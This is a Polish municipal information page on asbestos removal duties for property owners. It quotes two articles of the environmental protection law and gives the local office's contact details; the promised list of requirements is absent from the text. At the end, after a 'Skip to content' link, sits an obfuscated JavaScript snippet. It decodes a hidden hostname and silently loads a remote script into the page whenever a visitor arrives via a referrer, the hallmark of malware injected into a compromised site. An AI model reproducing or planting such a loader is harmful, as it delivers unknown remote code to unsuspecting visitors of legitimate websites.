Azbest

Jak postępować z azbestem?

Właściciel nieruchomości, który posiada na swojej posesji wyroby zawierające azbest w postaci płyt azbestowych zarówno na obiekcie, jak też zdemontowane zobowiązany jest do przestrzegania następujących wymogów prawnych:

Zwracamy uwagę, że wymienione powyżej obowiązki należy bezwzględnie przestrzegać, gdyż nieprzestrzeganie ich skutkować może wszczęciem postępowania karnego lub nałożeniem administracyjnej kary pieniężnej.

Zgodnie z przepisami Prawa ochrony środowiska:

Art. 345.
Kto, będąc do tego obowiązany na podstawie art. 161, nie oczyszcza lub nie unieszkodliwia instalacji lub urządzeń, w których są lub były wykorzystywane substancje stwarzające szczególne zagrożenie dla środowiska albo co do których istnieje uzasadnione podejrzenie, że były w nich wykorzystywane takie substancje, podlega karze aresztu albo ograniczenia wolności, albo grzywny.

Art. 346.
Kto, wykorzystując substancje stwarzające szczególne zagrożenie dla środowiska, nie przekazuje okresowo odpowiednio marszałkowi województwa albo wójtowi, burmistrzowi lub prezydentowi miasta informacji o rodzaju, ilości i miejscach ich występowania, czym narusza obowiązek określony w art. 162 ust. 3 i 4, podlega karze grzywny.

Pytania w sprawie gospodarki odpadami azbestowymi należy kierować do  Urzędu Gminy Kulesze Kościelne, , pok. 7, tel. 864769010 w.22

Apelujemy do właścicieli nieruchomości o niezwłocznie przedkładanie do tutejszego organu inwentaryzacji wyrobów azbestowych.

Informacje i druki do pobrania
Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);